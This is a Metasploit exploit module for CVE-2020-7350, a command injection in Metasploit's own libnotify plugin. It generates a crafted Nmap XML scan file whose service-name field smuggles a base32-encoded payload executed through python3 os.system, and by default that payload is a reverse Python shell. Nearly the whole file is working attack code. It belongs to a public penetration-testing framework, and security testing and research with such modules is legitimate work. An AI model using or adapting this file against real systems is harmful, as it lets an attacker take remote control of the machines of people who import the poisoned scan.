##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
        'Description' => %q{
          This module exploits a shell command injection vulnerability in the
          libnotify plugin. This vulnerability affects Metasploit versions
          5.0.79 and earlier.
        },
        'DisclosureDate' => '2020-03-04',
        'License' => GPL_LICENSE,
        'Author' => [
          'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
        ],
        'References' => [
          [ 'CVE', '2020-7350' ],
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
        ],
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Payload' => {
          'DisableNops' => true
        },
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_python'
        },
        'Targets' => [[ 'Automatic', {}]],
        'Privileged' => false,
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)

    print_status "Writing xml file: #{datastore['FILENAME']}"
    file_create xml
  end
end
